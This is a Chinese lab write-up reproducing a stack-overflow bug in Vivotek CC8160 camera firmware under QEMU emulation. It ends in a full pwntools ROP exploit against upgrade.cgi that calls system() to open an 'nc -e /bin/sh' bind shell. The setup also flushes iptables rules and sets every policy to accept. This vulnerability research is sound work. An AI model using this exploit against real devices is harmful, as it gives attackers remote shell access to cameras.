一、固件提取
binwalk -Me CC8160-VVTK-0113b.flash.pkg
二、官方揭露阅读
三、环境搭建
sudo chroot . ./qemu-arm-static ./usr/sbin/httpd
cat /proc/sys/kernel/hostname
cat ./etc/hosts
127.0.0.1 Network-Camera localhost
debian-armel
echo "192.168.100.2 debian-armel localhost" > squashfs-root/etc/hosts
rm -rf vmlinuz-3.2.0-4-versatile
rm -rf initrd.img-3.2.0-4-versatile
wget https://people.debian.org/~aurel32/qemu/armel/vmlinuz-3.2.0-4-versatile
wget https://people.debian.org/~aurel32/qemu/armel/initrd.img-3.2.0-4-versatile
sudo ip tuntap add mode tap name tap0
sudo ip link set tap0 up
sudo sysctl -w net.ipv4.ip_forward=1
sudo iptables -F
sudo iptables -X
sudo iptables -t nat -F
sudo iptables -t nat -X
sudo iptables -t mangle -F
sudo iptables -t mangle -X
sudo iptables -P INPUT ACCEPT
sudo iptables -P FORWARD ACCEPT
sudo iptables -P OUTPUT ACCEPT
sudo iptables -t nat -A POSTROUTING -o ens33 -j MASQUERADE #这里的网卡ens33要改成自己的噢
sudo iptables -I FORWARD 1 -i tap0 -j ACCEPT
sudo iptables -I FORWARD 1 -o tap0 -m state --state RELATED,ESTABLISHED -j ACCEPT
sudo ifconfig tap0 192.168.100.254 netmask 255.255.255.0
sudo qemu-system-arm
-M versatilepb
-kernel vmlinuz-3.2.0-4-versatile
-initrd initrd.img-3.2.0-4-versatile
-hda debian_wheezy_armel_standard.qcow2
-append "root=/dev/sda1"
-net nic -net tap,ifname=tap0,script=no,downscript=no
-nographic
ifconfig eth0 192.168.100.2 netmask 255.255.255.0
route add default gw 192.168.100.254
sudo scp -r squashfs-root/ [email protected]:/root
chmod -R 777 squashfs-root/
chroot ./squashfs-root/ /bin/sh
./usr/sbin/httpd
mount -t proc /proc ./squashfs-root/proc
mount -o bind /dev ./squashfs-root/dev
chmod -R 777 squashfs-root/
chroot ./squashfs-root/ /bin/sh
./usr/sbin/httpd
四、验证poc
echo -en "POST /cgi-bin/admin/upgrade.cgi HTTP/1.0nContent-Length:AAAAAAAAAAAAAAAAAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIXXXXnrnrn" | netcat -v 192.168.100.2 80
./gdbserver.armel --attach 192.168.100.254:1234 2440
cat /proc/2386/maps
五、漏洞利用
lyyy@ubuntu:~/Desktop/vr/squashfs-root$ ROPgadget --binary ./lib/libc.so.0 --only "pop|ret"
Gadgets information
============================================================
0x00046428 : pop {fp, pc}
0x00033100 : pop {r0, pc}
0x00048784 : pop {r1, pc}
0x0000b490 : pop {r3, pc}
0x0000d71c : pop {r3, r4, r5, pc}
0x0000a46c : pop {r3, r4, r5, r6, r7, pc}
0x0000cf14 : pop {r3, r4, r5, r6, r7, r8, sb, pc}
0x0002cf58 : pop {r3, r4, r5, r6, r7, r8, sb, pc} ; pop {r3, r4, r5, r6, r7, r8, sb, pc}
0x000174c8 : pop {r3, r4, r5, r6, r7, r8, sb, sl, fp, pc}
0x0000b7c0 : pop {r3, r4, r7, pc}
0x0000ae00 : pop {r4, pc}
0x0000ddf0 : pop {r4, pc} ; pop {r4, pc}
0x0000abb8 : pop {r4, r5, pc}
0x0000a83c : pop {r4, r5, r6, pc}
0x0000aa64 : pop {r4, r5, r6, r7, pc}
0x0000b364 : pop {r4, r5, r6, r7, r8, pc}
0x0000a700 : pop {r4, r5, r6, r7, r8, sb, pc}
0x0000db64 : pop {r4, r5, r6, r7, r8, sb, sl, fp, pc}
0x0000d110 : pop {r4, r5, r6, r7, r8, sb, sl, pc}
0x0000a97c : pop {r4, r5, r7, pc}
0x00042540 : pop {r4, r6, r7, pc}
0x0000b6e0 : pop {r4, r7, pc}
0x0000d320 : pop {r4, r7, pc} ; pop {r4, r7, pc}
0x0000a4ac : pop {r7, pc}
Unique gadgets found: 24
pop {r1,pc};==pop r1;ret
mov r0,r1;
0x00033100 pop r0 gadeget地址带有/x00,漏洞使用strncmp,所以会有/x00截断
from pwn import*
import requests
p=remote('192.168.100.2',80)
libc=ELF('./lib/libc.so.0')
context.log_level='debug'
libc_base=0xb6f2d000
pop_r1=0x00048784+libc_base
mov_r0_r1=0x00016aa4+libc_base
system=libc_base+libc.sym['system']
stack = 0xbeffeb64#反弹shell语句的地方
amd='aaaaaa'
head = b"POST /cgi-bin/admin/upgrade.cgi HTTP/1.0nContent-Length:"
payload = b'b'*(0x00003c-8)+p32(pop_r1)+p32(stack)+p32(mov_r0_r1)+b'b'*8+p32(system)
end = b'nc -lp 6666 -e /bin/sh;'+b'rnrn'
p.sendline(head+payload+end)
原文始发于微信公众号(山石网科安全技术研究院):Vivotek CC8160 固件栈溢出漏洞复现分析
